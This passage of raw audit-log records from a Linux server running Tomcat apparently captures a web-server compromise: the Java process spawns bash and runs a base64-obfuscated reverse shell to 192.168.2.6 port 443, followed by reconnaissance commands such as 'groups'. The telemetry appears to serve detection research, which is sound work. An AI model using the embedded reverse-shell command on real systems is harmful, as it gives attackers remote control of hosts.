containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/local/bin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/local/bin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:21Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292621.986:84142): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/sbin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/sbin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/sbin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/sbin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:21Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292621.986:84141): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:21Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292621.986:84140): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/sbin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/sbin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/sbin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/sbin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.007Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292621.990:84143): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"bash\" exe=\"/bin/bash\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/bin/bash\" inode=31 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/bin/bash\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=3 cmdline=\"bash -c \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuNi80NDMgMD4mMQo=}|{base64,-d}|{bash,-i}\"\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"bash\" exe=\"/bin/bash\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/bin/bash\" inode=31 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/bin/bash\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=3 cmdline=\"bash -c \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuNi80NDMgMD4mMQo=}|{base64,-d}|{bash,-i}\"\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.017Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.006:84144): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=5601f9bb2510 a1=5601f9bb27c0 a2=5601f9bb00a0 a3=5601f9ba4010 ppid=17790 pid=17794 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"bash\" exe=\"/bin/bash\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/bin/bash\" inode=31 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/bin/bash\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"bash -i\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=5601f9bb2510 a1=5601f9bb27c0 a2=5601f9bb00a0 a3=5601f9ba4010 ppid=17790 pid=17794 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"bash\" exe=\"/bin/bash\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/bin/bash\" inode=31 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/bin/bash\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"bash -i\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.023Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.006:84145): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=5601f9bb2540 a1=5601f9bb2820 a2=5601f9bb00a0 a3=5601f9ba4010 ppid=17790 pid=17793 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"base64\" exe=\"/usr/bin/base64\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/base64\" inode=4094 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/base64\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"base64 -d\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=5601f9bb2540 a1=5601f9bb2820 a2=5601f9bb00a0 a3=5601f9ba4010 ppid=17790 pid=17793 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"base64\" exe=\"/usr/bin/base64\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/base64\" inode=4094 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/base64\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"base64 -d\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.063Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.042:84148): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556da3d922d0 a1=556da3d923b0 a2=556da3d92b70 a3=8 ppid=17797 pid=17798 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"groups\" exe=\"/usr/bin/groups\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/groups\" inode=4166 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/groups\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=1 cmdline=\"groups\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556da3d922d0 a1=556da3d923b0 a2=556da3d92b70 a3=8 ppid=17797 pid=17798 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"groups\" exe=\"/usr/bin/groups\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/groups\" inode=4166 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/groups\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=1 cmdline=\"groups\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.077Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.066:84150): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556da3d90ed0 a1=556da3d90430 a2=556da3d901c0 a3=556da3d7f010 ppid=17799 pid=17800 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"lesspipe\" exe=\"/bin/dash\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/lesspipe\" inode=127 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/lesspipe\",\"/bin/sh\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\",\"0\"] path_ogid=[\"0\",\"0\",\"0\"] argc=2 cmdline=\"/bin/sh /usr/bin/lesspipe\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556da3d90ed0 a1=556da3d90430 a2=556da3d901c0 a3=556da3d7f010 ppid=17799 pid=17800 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"lesspipe\" exe=\"/bin/dash\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/lesspipe\" inode=127 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/lesspipe\",\"/bin/sh\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\",\"0\"] path_ogid=[\"0\",\"0\",\"0\"] argc=2 cmdline=\"/bin/sh /usr/bin/lesspipe\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.09Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.082:84151): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556f04197858 a1=556f03217c00 a2=556f041977c8 a3=556f04197010 ppid=17800 pid=17801 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"basename\" exe=\"/usr/bin/basename\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/basename\" inode=4095 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/basename\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"basename /usr/bin/lesspipe\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556f04197858 a1=556f03217c00 a2=556f041977c8 a3=556f04197010 ppid=17800 pid=17801 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"basename\" exe=\"/usr/bin/basename\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/basename\" inode=4095 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/basename\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"basename /usr/bin/lesspipe\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.103Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.094:84153): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556f041a2aa8 a1=556f041a29e0 a2=556f041a2a18 a3=556f04197010 ppid=17802 pid=17803 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"dirname\" exe=\"/usr/bin/dirname\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/dirname\" inode=4158 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/dirname\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] 